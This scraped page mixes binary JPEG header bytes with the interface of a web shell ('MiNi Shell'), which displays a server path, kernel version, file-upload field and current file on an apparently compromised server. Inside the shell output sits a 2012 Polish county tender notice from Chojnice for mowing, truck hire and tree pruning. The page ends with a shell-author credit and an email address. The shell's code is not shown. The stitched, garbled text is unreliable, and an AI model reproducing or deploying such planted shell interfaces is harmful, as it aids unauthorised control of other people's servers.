JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120309/74068-N-2012.html

<p class="kh_header"><b>Chojnice: USŁUGI ZWIĄZANE Z BIEŻĄCYM UTRZYMANIEM
DRÓG I ULIC POWIATOWYCH
z podziałem na części:

Część nr 1. Koszenie traw i chwastów
Część nr 2. Usługa transportowa samochodem do 5,0 Mg z HDS-em
Część nr 3. Podkrzesanie i formowanie korony drzew</b><br>
<b>Numer ogłoszenia: 74068 - 2012; data zamieszczenia: 09.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Chojnicki , ul. 31 Stycznia 56, 89-600 Chojnice, woj. pomorskie, tel. 052 3966533.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.chojnice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI ZWIĄZANE Z BIEŻĄCYM UTRZYMANIEM
DRÓG I ULIC POWIATOWYCH
z podziałem na części:

Część nr 1. Koszenie traw i chwastów
Część nr 2. Usługa transportowa samochodem do 5,0 Mg z HDS-em
Część nr 3. Podkrzesanie i formowanie korony drzew.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A.Przedmiotem zamówienia jest wykonanie usług p.n.
USŁUGI ZWIĄZANE Z BIEŻĄCYM UTRZYMANIEM DRÓG I ULIC POWIATOWYCH 
z podziałem na części:

Część nr 1. Koszenie traw i chwastów
Część nr 2. Usługa transportowa samochodem do 5,0 Mg  z HDS-em
Część nr 3. Podkrzesanie i formowanie korony drzew

B.Wykonawca jest zobowiązany sporządzić  dla CZĘŚCI NR  1  i  CZĘŚCI NR  3  projekt organizacji ruchu na czas wykonywania usługi
uzgodniony z :
-	Komendą Powiatową Policji w Chojnicach
zatwierdzony przez:
-	Starostwo Powiatowe w Chojnicach
C.Zakres robót :

CZĘŚĆ nr 1 - Koszenie traw i chwastów przy drogach powiatowych 
Koszenie traw i chwastów przy drogach powiatowych  w ilości 1.543,0 tys.m2 
Szacunkowa powierzchnia koszenia w ciągu dróg powiatowych z podziałem na poszczególne    
gminy:
gmina Brusy                                                              -  193,0 tys.m2  
gmina Chojnice                                                         -  700,0 tys.m2 
gmina Czersk                                                             -  320,0 tys.m2 
gmina Konarzyny                                                      -  100,0 tys. m2
miasto Chojnice  ( z wywozem trawy)                     -    80,00 tys.m2
ścieżka rowerowa w ciągu drogi powiatowej           -    75,0 tys. m2
nr 2634G Charzykowy-Karolewo 
(2500,00 m  x 6 m x 5 razy ręcznie i mechanicznie łącznie ze skarpami i wywozem  trawy)         
ścieżka rowerowa  w ciągu drogi powiatowej           -    75,0 tys. m2
nr 2410G Czersk-Malachin            
(2500,00 m  x 6 m x 5 razy ręcznie i mechanicznie łącznie ze skarpami i wywozem  
 trawy)         

Pierwsze koszenie: Rozpoczęcie  w m-cu   maj - czerwiec 2012  r.
Następne koszenia każdorazowo ustali Zamawiający o czym powiadomi Wykonawcę  z 
co najmniej trzydniowym wyprzedzeniem.

Wymagana szerokość koszenia   -  1,0 m.
Roboty wykonywane mechanicznie muszą być uzupełnione ręcznym obkoszeniem przy drzewach i urządzeniach drogowych.
Maksymalna wysokość  roślin pozostałych po skoszeniu do 5 cm
CZĘŚĆ NR 2. - Usługa transportowa samochodem do 5,0 Mg  z HDS-em
Wynajem samochodu skrzyniowego o ładowności do 5,0 Mg z HDS-em do transportu materiałów
związanych z utrzymaniem dróg powiatowych .
Miejsce realizacji zamówienia - teren  POWIATU CHOJNICKIEGO.   
Obsługa 2 osobowa  - kierowca + 1 pracownik fizyczny.
Zakres robót - 1000,00 godz. 

CZĘŚĆ NR 3. Podkrzesanie i formowanie korony drzew
Podkrzesanie i formowanie korony drzew w ilości 281,00 szt. w ciągu ulic powiatowych na terenie miasta Chojnice :
nr 2665G ul.Armii Ludowej   - 40,00 szt.
nr 2669G ul. Aleja Brzozowa - 10,00 szt.
nr 2656G ul. Drzymały           - 65,00 szt.
nr 2656 G ul.Wicka Rogali     - 28,00 szt.
nr 2658G ul.Strzelecka           - 62,00 szt.
nr 2652G ul.Wysoka              - 24,00 szt.
nr 2652G ul.Zielona               -   6,00 szt.
nr 2657G ul.Żwirki i Wigury  - 46,00 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w trybie zamówień z wolnej ręki na zasadach określonych w art. 67 ust. 1 pkt 6 ustawy - Prawo zamówień publicznych w wysokości do 50% zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.11.20.00-8, 60.10.00.00-9, 77.34.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalności prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują lub będą dysponowali w pełni sprawnymi narzędziami, wyposażeniem zakładu i urządzeniami technicznymi, gwarantującymi wymaganą jakość i postęp usług:

dla części nr 1:  Kosiarka  (rotacyjna lub bijakowa) - szt. 1
dla części nr 2:  Samochód skrzyniowy o ład. do 5,0 Mg z HDS  - szt.1
dla części nr 3:  Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>INNE DOKUMENTY WYMAGANE OD WYKONAWCY: Dla części 1,2 i 3
1)Wypełniony formularz ofertowy - druk OFERTA, 
2)Pełnomocnictwo dla osoby podpisującej ofertę do występowania w imieniu wykonawcy, jeżeli nie wynika to bezpośrednio z dokumentów rejestrowych lub w przypadku, o którym mowa w art. 23 ust. 2 ustawy Prawo zamówień publicznych - wg załącznika nr 5 do siwz.
3)Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom - wg załącznika
nr 4 do SIWZ
4)Wypełniony Kosztorys Ofertowy - zgodny z treścią formularza zamieszczonego w Rozdziale E  SIWZ kosztorys Ślepy
5)Zobowiązanie o współpracy wg Załącznika nr 6 do SIWZ Dla części 1,2 i 3
6)Parafowane Istotne postanowienia umowy-   zamieszczone w Rozdziale  F do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.Dla potrzeb Umowy, Siła Wyższa oznacza zdarzenie, którego wystąpienie jest niezależne od Stron i któremu nie mogą one zapobiec przy zachowaniu należytej staranności, a w szczególności: wojny, stany nadzwyczajne, klęski żywiołowe, epidemie, ograniczenia związane z kwarantanną, embargo, rewolucje, zamieszki i strajki.
4 Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zmiany terminu realizacji przedmiotu umowy w przypadku:
1)zlecenia przez Zamawiającego Wykonawcy w czasie realizacji zamówienia usług dodatkowych lub zamiennych o wartości przekraczającej 5 % wynagrodzenia   Wykonawcy, określonego w Umowie; termin wykonania usług określony w umowie nie ulega jednak zmianie w przypadku, gdy zlecenie usług dodatkowych lub zamiennych jest wynikiem nienależytego wykonywania usług przez  Wykonawcę,
2)wystąpienia okoliczności niezależnych od wykonawcy skutkujących niemożliwością dotrzymania terminu realizacji przedmiotu umowy,
3)zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
4)skrócenia terminu zakończenia realizacji umowy na pisemny wniosek Wykonawcy,
5)wstrzymania przez zamawiającego wykonywania prac nie wynikających z okoliczności leżących po stronie wykonawcy.
W przypadku zmiany terminu realizacji przedmiotu umowy, wymienionych w pkt 1-5, termin ten może ulec przedłużeniu nie dłużej jednak niż o czas trwania tych okoliczności.
5.Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku  do treści oferty w zakresie wartości  przedmiotu umowy  w przypadku:
1)zmiany stawki podatku od towarów i usług (VAT),
2) zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia;
6.Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zamiany podwykonawców w przypadku:
1)wprowadzenia nowego podwykonawcy,
2)rezygnacji podwykonawcy,
3)zmiany wartości lub zakresu usług wykonywanych przez podwykonawców. Zamawiający może wyrazić zgodę na powyższe, po pisemnym zaakceptowaniu umowy wykonawcy z podwykonawcą w terminie 14 dni od przekazania tej umowy przez wykonawcę.
7.Powyższe postanowienia stanowią katalog zmian, na które zamawiający może Wyrazić zgodę. Powyższe postanowienia nie stanowią zobowiązania zamawiającego do wyrażenia zgody na ich wprowadzenie.
8.Istotne dla Stron postanowienia zawiera wzór umowy, która stanowi integralną część niniejszej SIWZ.
9.Zamawiający nie zamierza zawrzeć umowy ramowej.
10.W przypadku wystąpienia okoliczności stanowiących podstawę do zmian postanowień umowy  Wykonawca zobowiązany jest do niezwłocznego, poinformowania o tym fakcie Zamawiającego i  wystąpienia z wnioskiem o dokonanie zmian w przedmiotowej umowie.
11.Jeżeli Zamawiający uzna, że okoliczności wskazane przez Wykonawcę jako stanowiące podstawę do zmiany umowy nie są zasadne, Wykonawca zobowiązany jest do realizacji zadania zgodnie z warunkami zawartymi w umowie. Zmiana umowy może nastąpić w formie pisemnej, pod rygorem nieważności takiego oświadczenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.chojnice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
ul.31 Stycznia 56
89-600 chojnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2012 godzina 09:00, miejsce: Starostwio Powiatowe w Chojnicach
ul. 31 Stycznia 56, 89-600 Chojnice 
Biuro Obsługi Interesantów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Koszenie traw i chwastów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> B.Wykonawca jest zobowiązany sporządzić  dla CZĘŚCI NR  1  i  CZĘŚCI NR  3  projekt organizacji ruchu na  czas wykonywania usługi
 uzgodniony z :
Komendą Powiatową Policji w Chojnicach
zatwierdzony przez:
Starostwo Powiatowe w Chojnicach
C.Zakres robót :

CZĘŚĆ nr 1 - Koszenie traw i chwastów przy drogach powiatowych 
Koszenie traw i chwastów przy drogach powiatowych  w ilości 1.543,0 tys.m2 
Szacunkowa powierzchnia koszenia w ciągu dróg powiatowych z podziałem na poszczególne    
gminy:
gmina Brusy                                                              -  193,0 tys.m2  
gmina Chojnice                                                         -  700,0 tys.m2 
gmina Czersk                                                             -  320,0 tys.m2 
gmina Konarzyny                                                      -  100,0 tys. m2
miasto Chojnice  ( z wywozem trawy)                     -    80,00 tys.m2
ścieżka rowerowa w ciągu drogi powiatowej           -    75,0 tys. m2
nr 2634G Charzykowy-Karolewo 
(2500,00 m  x 6 m x 5 razy ręcznie i mechanicznie łącznie ze skarpami i wywozem  
    trawy)         
ścieżka rowerowa  w ciągu drogi powiatowej           -    75,0 tys. m2
nr 2410G Czersk-Malachin            
(2500,00 m  x 6 m x 5 razy ręcznie i mechanicznie łącznie ze skarpami i wywozem  
 trawy)         

Pierwsze koszenie: Rozpoczęcie  w m-cu   maj - czerwiec 2012  r.
Następne koszenia każdorazowo ustali Zamawiający o czym powiadomi Wykonawcę  z co najmniej trzydniowym wyprzedzeniem.

Wymagana szerokość koszenia   -  1,0 m.
Roboty wykonywane mechanicznie muszą być uzupełnione ręcznym obkoszeniem przy drzewach i urządzeniach drogowych.
Maksymalna wysokość  roślin pozostałych po skoszeniu do 5 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.11.20.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa transportowa samochodem do 5,0 Mg  z HDS-em.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ NR 2. - Usługa transportowa samochodem do 5,0 Mg  z HDS-em
Wynajem samochodu skrzyniowego o ładowności do 5,0 Mg z HDS-em do transportu materiałów związanych z utrzymaniem dróg powiatowych .
Miejsce realizacji zamówienia - teren  POWIATU CHOJNICKIEGO.   
Obsługa 2 osobowa  - kierowca + 1 pracownik fizyczny.
 Zakres robót - 1000,00 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Podkrzesanie i formowanie korony drzew.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> B.Wykonawca jest zobowiązany sporządzić  dla CZĘŚCI NR  1  i  CZĘŚCI NR  3  projekt organizacji ruchu na czas wykonywania usługi
uzgodniony z :
Komendą Powiatową Policji w Chojnicach
zatwierdzony przez:
Starostwo Powiatowe w Chojnicach
C.Zakres robót :
CZĘŚĆ NR 3. Podkrzesanie i formowanie korony drzew
Podkrzesanie i formowanie korony drzew w ilości 281,00 szt. w ciągu ulic powiatowych na terenie miasta Chojnice :
nr 2665G ul.Armii Ludowej   - 40,00 szt.
nr 2669G ul. Aleja Brzozowa - 10,00 szt.
nr 2656G ul. Drzymały           - 65,00 szt.
nr 2656 G ul.Wicka Rogali     - 28,00 szt.
nr 2658G ul.Strzelecka           - 62,00 szt.
nr 2652G ul.Wysoka              - 24,00 szt.
nr 2652G ul.Zielona               -   6,00 szt.
nr 2657G ul.Żwirki i Wigury  - 46,00 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.34.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com